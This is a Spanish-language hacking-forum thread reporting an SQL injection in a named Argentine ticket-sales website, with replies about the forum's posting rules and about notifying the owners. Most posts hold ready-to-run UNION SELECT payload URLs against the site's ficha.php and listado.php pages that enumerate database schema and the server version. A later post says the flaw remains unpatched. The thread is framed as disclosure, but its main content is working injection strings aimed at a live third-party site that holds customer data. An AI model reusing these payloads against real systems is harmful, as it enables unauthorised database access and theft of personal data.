Underc0de

****************************************************
   SQLi www.1000tickets.com.ar (http://www.1000tickets.com.ar)
****************************************************

> Site: www.1000tickets.com.ar (http://www.1000tickets.com.ar)

> Descripción del site: venta de entradas para conciertos y demás.

(http://i.imgur.com/0tgAFZC.png)

> Descripción de la vulnerabilidad:

  -Se encuentra un síntoma de vulnerabilidad frente a SQLi.
 
  -Se halla el tipo de inyección y se comprueba manualmente y mediante SQLHelper

(http://i.imgur.com/fNMLh08.png)

(http://i.imgur.com/dh2lAFq.png)

  -Tras esto se puede proceder a la búsqueda de información sensible, que puede ser utilizada con fines no éticos.

Tratandose de una página de venta de entradas, la información que contiene esta base de datos puede ser peligrosa si cae en malas manos.

Método manual:

(http://i.imgur.com/mr5wlLK.png)

(http://i.imgur.com/4pHxUud.png)

Payload:http://www.1000tickets.com.ar/ficha.php?id=7-1+UNION+SELECT+1,2,3,4,group_concat(column_name),6,7,8,9,10,11,12,13,14,15,16,17,18,19+from+information_schema.columns+where+table_name=char(116,98,108,95,117,115,117,97,114,105,111)--

Método automático con SQLHelper:

(http://i.imgur.com/zXErPIW.png)

Vulnerabilidad reportada por la comunidad de Underc0de.

Autor: hati

http://www.1000tickets.com.ar/ficha.php
?id=-91 union select 1,(select (@a) from (select(@a:=0x00),(select (@a) from (information_schema.columns)where table_schema!=0x696e666f726d6174696f6e5f736368656d61 and(@a)in (@a:=concat(@a,table_schema,0x203e20,table_name,0x3e,column_name,0x3c62723e))))a),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19 -- -

@hati (https://underc0de.org/foro/index.php?action=profile;u=53687) a esto le falta el payload si no no cuenta para esta sección, te recomiendo que leas las reglas (https://underc0de.org/foro/hacking-showoff/queres-que-tu-bug-aparezca-en-hacking-showoff/) para poder postear aca los bugs que encuentres, y como concejo deja las tools automatizadas.

http://www.1000tickets.com.ar/ficha.php?id=91+and+1=5+union+select+1,@@version,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19+--+

Saludos!, EPSILON

No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
@hati (https://underc0de.org/foro/index.php?action=profile;u=53687) a esto le falta el payload si no no cuenta para esta sección, te recomiendo que leas las reglas (https://underc0de.org/foro/hacking-showoff/queres-que-tu-bug-aparezca-en-hacking-showoff/) para poder postear aca los bugs que encuentres, y como concejo deja las tools automatizadas.

Código (text) [Seleccionar] Expandir

http://www.1000tickets.com.ar/ficha.php?id=91+and+1=5+union+select+1,@@version,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19+--+

Saludos!, EPSILON

Lo realicé de manera manual también, pero tienes razón en que debería haber puesto el payload, no me di cuenta, problema solucionado.
Gracias por avisar @EPSILON (https://underc0de.org/foro/profile/EPSILON/), ¿podría recibir ayuda para comunicar la vulnerabilidad?

No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
@hati (https://underc0de.org/foro/index.php?action=profile;u=53687) a esto le falta el payload si no no cuenta para esta sección, te recomiendo que leas las reglas (https://underc0de.org/foro/hacking-showoff/queres-que-tu-bug-aparezca-en-hacking-showoff/) para poder postear aca los bugs que encuentres, y como concejo deja las tools automatizadas.

Código (text) [Seleccionar] Expandir

http://www.1000tickets.com.ar/ficha.php?id=91+and+1=5+union+select+1,@@version,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19+--+

Saludos!, EPSILON

Lo realicé de manera manual también, pero tienes razón en que debería haber puesto el payload, no me di cuenta, problema solucionado.
Gracias por avisar @EPSILON (https://underc0de.org/foro/profile/EPSILON/), ¿podría recibir ayuda para comunicar la vulnerabilidad?

Quieres reportarlo tu? o que lo haga la comunidad por ti?

Saludos.

Si es posible que la comunidad lo haga por mi lo agradecería @blackdrake (https://underc0de.org/foro/profile/blackdrake/), y también gracias a ti por responderme.

No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
Si es posible que la comunidad lo haga por mi lo agradecería @blackdrake (https://underc0de.org/foro/profile/blackdrake/), y también gracias a ti por responderme.

Excelente, nos encargamos entonces! :D

Saludos.

@blackdrake (https://underc0de.org/foro/profile/blackdrake/) gracias a ti a la comunidad de Underc0de

No se si revivir el post.

La vulnerabilidad sigue activa.


http://www.1000tickets.com.ar/listado.php?idcat=1%20union%20select%201,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19


Saludos.

No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
No se si revivir el post.

La vulnerabilidad sigue activa.

Código [Seleccionar] Expandir


http://www.1000tickets.com.ar/listado.php?idcat=1%20union%20select%201,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19


Saludos.

Si, nunca contestaron al correo y obviamente tampoco lo fixearon xD